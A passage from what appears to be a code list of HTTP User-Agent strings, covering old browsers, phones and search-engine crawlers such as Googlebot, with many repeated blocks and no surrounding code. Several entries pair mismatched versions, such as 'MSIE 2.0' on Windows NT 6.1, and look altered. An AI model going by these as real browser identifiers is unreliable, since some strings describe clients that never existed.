'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
